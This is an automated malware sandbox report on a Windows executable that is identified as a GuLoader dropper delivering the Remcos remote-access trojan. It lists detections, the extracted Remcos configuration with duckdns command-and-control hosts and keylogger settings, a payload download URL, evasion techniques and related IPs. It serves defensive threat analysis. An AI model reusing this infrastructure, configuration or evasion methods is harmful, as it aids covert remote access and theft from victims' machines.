Loading ...

Play interactive tourEdit tour

Windows Analysis Report 8TEZmAEx3U.exe

Overview

General Information

Sample Name:8TEZmAEx3U.exe
Analysis ID:491398
MD5:28c8b2207bb3e6884e1e29575fb19bec
SHA1:5af638a980ba849bc6244dffb0caff4fb88c88d7
SHA256:7b3c49295c67d0de6a1739eca11609fc551805075fd66facfec8e2a2b6ca016c
Tags:exeRATRemcosRAT
Infos:

Most interesting Screenshot:

Detection

GuLoader Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Multi AV Scanner detection for submitted file
GuLoader behavior detected
Yara detected Remcos RAT
Yara detected GuLoader
Hides threads from debuggers
Tries to detect Any.run
C2 URLs / IPs found in malware configuration
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Uses dynamic DNS services
Uses 32bit PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected TCP or UDP traffic on non-standard ports
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Abnormal high CPU Usage

Classification

Process Tree

  • System is w10x64
  • 8TEZmAEx3U.exe (PID: 400 cmdline: 'C:\Users\user\Desktop\8TEZmAEx3U.exe' MD5: 28C8B2207BB3E6884E1E29575FB19BEC)
    • 8TEZmAEx3U.exe (PID: 6632 cmdline: 'C:\Users\user\Desktop\8TEZmAEx3U.exe' MD5: 28C8B2207BB3E6884E1E29575FB19BEC)
  • cleanup

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "solex-wave.duckdns.org:2404:0solex-wave.duckdns.org:2222:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-Y0PK9D", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}

Threatname: GuLoader

{"Payload URL": "http://sopage.duckdns.org/Remcos_s_bChlcwVW46.bin"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.761066423.0000000000707000.00000004.00000020.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000000.00000002.486721173.0000000002230000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Overview

      No Sigma rule has matched

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 0000000E.00000002.761066423.0000000000707000.00000004.00000020.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "solex-wave.duckdns.org:2404:0solex-wave.duckdns.org:2222:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-Y0PK9D", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}
      Source: 00000000.00000002.486721173.0000000002230000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://sopage.duckdns.org/Remcos_s_bChlcwVW46.bin"}
      Multi AV Scanner detection for submitted fileShow sources
      Source: 8TEZmAEx3U.exeVirustotal: Detection: 18%Perma Link
      Yara detected Remcos RATShow sources
      Source: Yara matchFile source: 0000000E.00000002.761066423.0000000000707000.00000004.00000020.sdmp, type: MEMORY
      Machine Learning detection for sampleShow sources
      Source: 8TEZmAEx3U.exeJoe Sandbox ML: detected
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 0_2_00402504 CryptDestroyHash,
      Source: 8TEZmAEx3U.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2032776 ET TROJAN Remocs 3.x Unencrypted Checkin 192.168.2.5:49753 -> 23.146.242.71:2404
      Source: TrafficSnort IDS: 2032777 ET TROJAN Remocs 3.x Unencrypted Server Response 23.146.242.71:2404 -> 192.168.2.5:49753
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: solex-wave.duckdns.org
      Source: Malware configuration extractorURLs: http://sopage.duckdns.org/Remcos_s_bChlcwVW46.bin
      Uses dynamic DNS servicesShow sources
      Source: unknownDNS query: name: sopage.duckdns.org
      Source: unknownDNS query: name: solex-wave.duckdns.org
      Source: global trafficHTTP traffic detected: GET /Remcos_s_bChlcwVW46.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: sopage.duckdns.orgCache-Control: no-cache
      Source: global trafficTCP traffic: 192.168.2.5:49753 -> 23.146.242.71:2404
      Source: Joe Sandbox ViewASN Name: VDI-NETWORKUS VDI-NETWORKUS
      Source: Joe Sandbox ViewASN Name: VDI-NETWORKUS VDI-NETWORKUS
      Source: Joe Sandbox ViewIP Address: 23.146.242.85 23.146.242.85
      Source: unknownDNS traffic detected: queries for: sopage.duckdns.org
      Source: global trafficHTTP traffic detected: GET /Remcos_s_bChlcwVW46.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: sopage.duckdns.orgCache-Control: no-cache

      E-Banking Fraud:

      barindex
      Yara detected Remcos RATShow sources
      Source: Yara matchFile source: 0000000E.00000002.761066423.0000000000707000.00000004.00000020.sdmp, type: MEMORY

      System Summary:

      barindex
      Potential malicious icon foundShow sources
      Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
      Source: 8TEZmAEx3U.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: 8TEZmAEx3U.exe, 00000000.00000002.485866652.000000000042D000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameProfylaktiskes.exe vs 8TEZmAEx3U.exe
      Source: 8TEZmAEx3U.exe, 0000000E.00000000.484947800.000000000042D000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameProfylaktiskes.exe vs 8TEZmAEx3U.exe
      Source: 8TEZmAEx3U.exeBinary or memory string: OriginalFilenameProfylaktiskes.exe vs 8TEZmAEx3U.exe
      Source: 8TEZmAEx3U.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 0_2_0223960B
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 0_2_02239BAA
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 0_2_02237648
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 0_2_02237485
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 0_2_0223030C
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 0_2_0223799C
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 0_2_0223B7F0
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 0_2_0223960B NtWriteVirtualMemory,NtAllocateVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 0_2_0223DBD2 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 0_2_0223B7F0 NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 14_2_0056EBFC Sleep,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 14_2_0056EAB9 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 14_2_0056EC5F NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 14_2_0056EB41 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 14_2_0056EAB0 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 14_2_0056EC79 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeProcess Stats: CPU usage > 98%
      Source: 8TEZmAEx3U.exeVirustotal: Detection: 18%
      Source: 8TEZmAEx3U.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: unknownProcess created: C:\Users\user\Desktop\8TEZmAEx3U.exe 'C:\Users\user\Desktop\8TEZmAEx3U.exe'
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeProcess created: C:\Users\user\Desktop\8TEZmAEx3U.exe 'C:\Users\user\Desktop\8TEZmAEx3U.exe'
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeProcess created: C:\Users\user\Desktop\8TEZmAEx3U.exe 'C:\Users\user\Desktop\8TEZmAEx3U.exe'
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-Y0PK9D
      Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@3/0@2/2
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: 00000000.00000002.486721173.0000000002230000.00000040.00000001.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 0_2_00409468 push eax; retf
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 0_2_00409429 push 00000004h; ret
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 0_2_004090F2 push ebp; ret
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 0_2_00407B04 push ecx; retf
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 0_2_004093C7 push edx; retf
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 0_2_004093DB push edx; retf
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 0_2_00408DF3 push ebx; retf
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 0_2_02231432 pushfd ; ret
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 0_2_0223123B push es; iretd
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 0_2_02234017 push ds; retf
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 0_2_02236E61 push ebx; retf
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 0_2_02235C66 push FFFFFFA2h; ret
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 0_2_02236873 push ds; iretd
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 0_2_02230055 push esp; iretd
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 0_2_022300C2 push esp; iretd
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 0_2_02236D29 pushad ; retf
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 0_2_022313C8 pushfd ; ret
      Source: initial sampleStatic PE information: section name: .text entropy: 6.93605268847
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Tries to detect Any.runShow sources
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeFile opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeFile opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: 8TEZmAEx3U.exe, 00000000.00000002.486828735.0000000002AA0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
      Source: 8TEZmAEx3U.exe, 00000000.00000002.486828735.0000000002AA0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeWindow / User API: threadDelayed 647
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exe TID: 5768Thread sleep count: 647 > 30
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeSystem information queried: ModuleInformation
      Source: 8TEZmAEx3U.exe, 00000000.00000002.486828735.0000000002AA0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
      Source: 8TEZmAEx3U.exe, 00000000.00000002.486828735.0000000002AA0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

      Anti Debugging:

      barindex
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 0_2_0223BF06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeCode function: 0_2_0223B7A9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\8TEZmAEx3U.exeProcess created: C:\Users\user\Desktop\8TEZmAEx3U.exe 'C:\Users\user\Desktop\8TEZmAEx3U.exe'
      Source: 8TEZmAEx3U.exe, 0000000E.00000002.761378981.0000000000EA0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: 8TEZmAEx3U.exe, 0000000E.00000002.761378981.0000000000EA0000.00000002.00020000.sdmpBinary or memory string: Progman
      Source: 8TEZmAEx3U.exe, 0000000E.00000002.761378981.0000000000EA0000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
      Source: 8TEZmAEx3U.exe, 0000000E.00000002.761378981.0000000000EA0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
      Source: 8TEZmAEx3U.exe, 0000000E.00000002.761378981.0000000000EA0000.00000002.00020000.sdmpBinary or memory string: Progmanlock

      Stealing of Sensitive Information:

      barindex
      GuLoader behavior detectedShow sources
      Source: Initial fileSignature Results: GuLoader behavior
      Yara detected Remcos RATShow sources
      Source: Yara matchFile source: 0000000E.00000002.761066423.0000000000707000.00000004.00000020.sdmp, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected Remcos RATShow sources
      Source: Yara matchFile source: 0000000E.00000002.761066423.0000000000707000.00000004.00000020.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection12Virtualization/Sandbox Evasion21OS Credential DumpingSecurity Software Discovery31Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection12LSASS MemoryVirtualization/Sandbox Evasion21Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol212Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      8TEZmAEx3U.exe18%VirustotalBrowse
      8TEZmAEx3U.exe100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://sopage.duckdns.org/Remcos_s_bChlcwVW46.bin0%Avira URL Cloudsafe
      solex-wave.duckdns.org0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      sopage.duckdns.org
      23.146.242.85
      truetrue
        unknown
        solex-wave.duckdns.org
        23.146.242.71
        truetrue
          unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://sopage.duckdns.org/Remcos_s_bChlcwVW46.bintrue
          • Avira URL Cloud: safe
          unknown
          solex-wave.duckdns.orgtrue
          • Avira URL Cloud: safe
          unknown

          Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public

          IPDomainCountryFlagASNASN NameMalicious
          23.146.242.71
          solex-wave.duckdns.orgReserved
          46664VDI-NETWORKUStrue
          23.146.242.85
          sopage.duckdns.orgReserved
          46664VDI-NETWORKUStrue

          General Information

          Joe Sandbox Version:33.0.0 White Diamond
          Analysis ID:491398
          Start date:27.09.2021
          Start time:14:52:37
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 8m 10s
          Hypervisor based Inspection enabled:false
          Report type:light
          Sample file name:8TEZmAEx3U.exe
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:17
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.rans.troj.evad.winEXE@3/0@2/2
          EGA Information:Failed
          HDC Information:
          • Successful, ratio: 17.7% (good quality ratio 4.8%)
          • Quality average: 13%
          • Quality standard deviation: 24.2%
          HCA Information:Failed
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Found application associated with file extension: .exe
          • Override analysis time to 240s for sample files taking high CPU consumption
          Warnings:
          Show All
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
          • TCP Packets have been reduced to 100
          • Excluded IPs from analysis (whitelisted): 23.54.113.53, 95.100.54.203, 20.82.209.183
          • Excluded domains from analysis (whitelisted): e12564.dspb.akamaiedge.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, store-images.s-microsoft.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, arc.trafficmanager.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.

          Simulations

          Behavior and APIs

          No simulations

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          23.146.242.71466XoziOLD.exeGet hashmaliciousBrowse
            hVlpEajflR.exeGet hashmaliciousBrowse
              http___sowork.duckdns.org_11d_solex.exeGet hashmaliciousBrowse
                23.146.242.857HHrcwZjLI.exeGet hashmaliciousBrowse
                • dypage.duckdns.org/remcos_d_QUBXVO174.bin
                466XoziOLD.exeGet hashmaliciousBrowse
                • sopage.duckdns.org/Remcos_s_bChlcwVW46.bin
                hVlpEajflR.exeGet hashmaliciousBrowse
                • spage.duckdns.org/Remcos_S_tGNeLX139.bin
                0rUkHCgvVf.exeGet hashmaliciousBrowse
                • dpage.duckdns.org/remcos_d_fIqfwC80.bin
                JQPFEy9Ekx.exeGet hashmaliciousBrowse
                • dyn-bin.duckdns.org/remcos_d_fIqfwC80.bin
                http___sowork.duckdns.org_11d_solex.exeGet hashmaliciousBrowse
                • sol-bin.duckdns.org/Remcos_S_tGNeLX139.bin

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                solex-wave.duckdns.org466XoziOLD.exeGet hashmaliciousBrowse
                • 23.146.242.71
                sopage.duckdns.org466XoziOLD.exeGet hashmaliciousBrowse
                • 23.146.242.85

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                VDI-NETWORKUS7HHrcwZjLI.exeGet hashmaliciousBrowse
                • 23.146.242.85
                466XoziOLD.exeGet hashmaliciousBrowse
                • 23.146.242.85
                hVlpEajflR.exeGet hashmaliciousBrowse
                • 23.146.242.85
                0rUkHCgvVf.exeGet hashmaliciousBrowse
                • 23.146.242.85
                HxXHmM0T9f.exeGet hashmaliciousBrowse
                • 23.146.242.147
                JQPFEy9Ekx.exeGet hashmaliciousBrowse
                • 23.146.242.85
                http___sowork.duckdns.org_11d_solex.exeGet hashmaliciousBrowse
                • 23.146.242.85
                eXik5mFvet.exeGet hashmaliciousBrowse
                • 23.146.242.94
                CVEXzxk43s.exeGet hashmaliciousBrowse
                • 23.146.242.94
                yOCBr7SNLJ.exeGet hashmaliciousBrowse
                • 23.146.242.94
                13FlI4deWN.exeGet hashmaliciousBrowse
                • 23.146.242.94
                Payment Notification.exeGet hashmaliciousBrowse
                • 23.146.242.147
                Payment Notification.scr.exeGet hashmaliciousBrowse
                • 23.146.242.147
                Payment Notification.scr.exeGet hashmaliciousBrowse
                • 23.146.242.147
                Request For Quotation.jarGet hashmaliciousBrowse
                • 23.146.242.147
                OvBS76pTyX.exeGet hashmaliciousBrowse
                • 23.146.242.94
                U6lqJJBG8S.exeGet hashmaliciousBrowse
                • 23.146.242.94
                pNyAinWdWJ.exeGet hashmaliciousBrowse
                • 23.146.242.94
                YTVrQC7FhG.exeGet hashmaliciousBrowse
                • 23.146.242.94
                I4eRfFgJG7.exeGet hashmaliciousBrowse
                • 23.146.242.94
                VDI-NETWORKUS7HHrcwZjLI.exeGet hashmaliciousBrowse
                • 23.146.242.85
                466XoziOLD.exeGet hashmaliciousBrowse
                • 23.146.242.85
                hVlpEajflR.exeGet hashmaliciousBrowse
                • 23.146.242.85
                0rUkHCgvVf.exeGet hashmaliciousBrowse
                • 23.146.242.85
                HxXHmM0T9f.exeGet hashmaliciousBrowse
                • 23.146.242.147
                JQPFEy9Ekx.exeGet hashmaliciousBrowse
                • 23.146.242.85
                http___sowork.duckdns.org_11d_solex.exeGet hashmaliciousBrowse
                • 23.146.242.85
                eXik5mFvet.exeGet hashmaliciousBrowse
                • 23.146.242.94
                CVEXzxk43s.exeGet hashmaliciousBrowse
                • 23.146.242.94
                yOCBr7SNLJ.exeGet hashmaliciousBrowse
                • 23.146.242.94
                13FlI4deWN.exeGet hashmaliciousBrowse
                • 23.146.242.94
                Payment Notification.exeGet hashmaliciousBrowse
                • 23.146.242.147
                Payment Notification.scr.exeGet hashmaliciousBrowse
                • 23.146.242.147
                Payment Notification.scr.exeGet hashmaliciousBrowse
                • 23.146.242.147
                Request For Quotation.jarGet hashmaliciousBrowse
                • 23.146.242.147
                OvBS76pTyX.exeGet hashmaliciousBrowse
                • 23.146.242.94
                U6lqJJBG8S.exeGet hashmaliciousBrowse
                • 23.146.242.94
                pNyAinWdWJ.exeGet hashmaliciousBrowse
                • 23.146.242.94
                YTVrQC7FhG.exeGet hashmaliciousBrowse
                • 23.146.242.94
                I4eRfFgJG7.exeGet hashmaliciousBrowse
                • 23.146.242.94

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                No created / dropped files found

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):6.699622688151151
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.15%
                • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:8TEZmAEx3U.exe
                File size:184320
                MD5:28c8b2207bb3e6884e1e29575fb19bec
                SHA1:5af638a980ba849bc6244dffb0caff4fb88c88d7
                SHA256:7b3c49295c67d0de6a1739eca11609fc551805075fd66facfec8e2a2b6ca016c
                SHA512:03064bc3b8dc9dd43d9d5dc2f32d48a5da92e34640e316b82bf01bea591a81827f3177b7a211de6b612a38c728236c6719b8510538169328382bc3faf90e073f
                SSDEEP:3072:hTp6q3h21cWcznuYnl8AFZ6qnQaanfrMjVJK5T:hT7t6YlLZ66w/
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L....m.R.....................0......`.............@................

                File Icon

                Icon Hash:20047c7c70f0e004

